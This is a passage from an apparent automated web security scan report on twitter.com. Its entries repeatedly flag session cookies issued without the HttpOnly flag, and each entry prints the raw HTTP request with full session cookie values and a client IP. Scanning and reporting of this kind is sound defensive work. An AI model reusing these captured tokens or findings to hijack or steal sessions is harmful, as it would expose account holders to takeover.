The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.140. http://twitter.com/malsup/status/30791740717801472 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/30791740717801472

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlM2ViNDhhMTdlMDQx%250AMTNkNjM4ZWNjZjJjNzM1YzRhNGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--57098155f97d7c28fdd3d7868ba2f1b52affaed0; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.141. http://twitter.com/mariamenounos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/mariamenounos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mariamenounos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.142. http://twitter.com/mattbanks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/mattbanks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mattbanks HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.143. http://twitter.com/mattbanks/status/28168049634844672 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/mattbanks/status/28168049634844672

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWF0dGJhbmtz%250AL3N0YXR1cy8yODE2ODA0OTYzNDg0NDY3MjoMY3NyZl9pZCIlMjQzOTBlZDZh%250ANWJhODhmMzZjMTQyNDJjYTViZTE2Y2M6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--345453cec4138598b9a08c29980df4c39c3aba90; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mattbanks/status/28168049634844672 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.144. http://twitter.com/mennovanslooten previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/mennovanslooten

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mennovanslooten HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.145. http://twitter.com/messengerpost previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/messengerpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /messengerpost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.146. http://twitter.com/miketaylr previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/miketaylr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.147. http://twitter.com/miketaylr/status/28450462860574722 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/miketaylr/status/28450462860574722

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoMY3NyZl9pZCIlODgzNDE0MmFh%250AYjIxNmFlNTQzYjMzMTE1YjIwN2I2OTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--7486f8d612e6b798f03b8c042950cee765d57f1e; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.148. http://twitter.com/moxiesoft previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/moxiesoft

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/
k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com
guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.149. http://twitter.com/onlyjazz previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/onlyjazz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.150. http://twitter.com/onlyjazz/status/29924505002446849 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/onlyjazz/status/29924505002446849

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vb25seWphenov%250Ac3RhdHVzLzI5OTI0NTA1MDAyNDQ2ODQ5Ogxjc3JmX2lkIiVjZGY1NzI3MTNk%250ANzEzZDVmYzU1N2MyZWJiOTIxMWNhMzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--92541950a44bd04792a3b27273e15bc7882e2cca; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlyjazz/status/29924505002446849 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.151. http://twitter.com/oschina previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/oschina

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.152. http://twitter.com/oschina/status/28102821484171264 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/oschina/status/28102821484171264

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJTEwZDU0OTEzNjYw%250AOWY1ZTk1YmNlOWQ5ZWI3Njc5ZjczOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--68179dfd893f83c3d5cc5cabbcfb96d9a300ec19; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina/status/28102821484171264 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.153. http://twitter.com/oschina/status/30099933486915584 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/oschina/status/30099933486915584

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWZkOWU3MGFjNzg5%250ANmVhNjZmOTMxN2NlNjZmMGExNWNkOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--6d3f8e3e6d67d971b281da438de9b57a6477922e; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.154. http://twitter.com/privacy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlNGY1MzgyYzMzYTg4Mzg2YTMzY2RlZDc2NjAwMDli%250AMzM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--0d04f4b19d1ef9fb4248b979f81a1df77a504fb3; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.155. http://twitter.com/profile/not_logged_in/malsup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/profile/not_logged_in/malsup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile/not_logged_in/malsup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 404 Not Found
Date: Fri, 28 Jan 2011 14:31:21 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296225081-23068-11363
Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.156. http://twitter.com/rachbarnhart previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rachbarnhart

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.157. http://twitter.com/rem previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

